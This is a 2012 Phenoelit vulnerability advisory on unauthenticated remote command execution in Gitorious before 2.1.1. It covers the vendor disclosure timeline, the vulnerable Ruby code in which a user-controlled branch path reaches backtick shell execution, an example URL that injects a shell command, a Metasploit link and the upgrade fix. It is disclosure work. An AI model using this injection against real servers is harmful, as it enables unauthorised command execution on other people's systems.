Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +--+-> [ Authors ] joernchen <joernchen () phenoelit de> Phenoelit Group (http://www.phenoelit.de) [ Affected Products ] Gitorious < 2.1.1 (http://gitorious.org) [ Vendor communication ] 2012-01-16 Asking vendor for PGP key 2012-01-17 Getting PGP key from vendor 2012-01-17 Sending vulnerability details to vendor 2012-01-19 Vendor replies and sends link to patch [0] 2012-01-19 Asking if users will be informed 2012-01-20 Vendor states that they will create a patch and let the users know 2012-01-25 Asking for a timeline for the notification 2012-01-26 Vendor replies that patched branch is pushed and users are informed via a mailinglist. 2012-01-27 Release of this advisory [ Overview ] Gitorious is a Git repository management software written in Ruby on Rails. [ Description ] Gitorious has been found vulnerable to unauthenticated remote command execution. Root cause is in gitorious-mainline/lib/gitorious/git_shell.rb: def execute(command) Timeout.timeout(20) do `#{command}` end rescue Timeout::Error called by app/controllers/api/graphs_controller.rb: def graph_log(repo, type, branch = nil) args = [repo.full_repository_path, "--decorate=full", "-100", type] args << desplat_path(branch) if branch git_shell.send(:graph_log, *args) end where branch is user controlled via route: api.connect ':project_id/:repository_id/log/graph/*branch', :controller => 'graphs', :action => 'show' [ Example ] http://gitorious.site/project/repo/log/graph/`id>/tmp/command_exec` For convenient use of this feature have a look at [1] [ Solution ] Update to version 2.1.1 [ References ] [0] https://gitorious.org/gitorious/mainline/commit/ 647aed91a4dc72e88a27476948dfbacd5d0bf7ce [1] http://metasploit.com/modules/exploit/multi/http/gitorious_graph [ end of file ]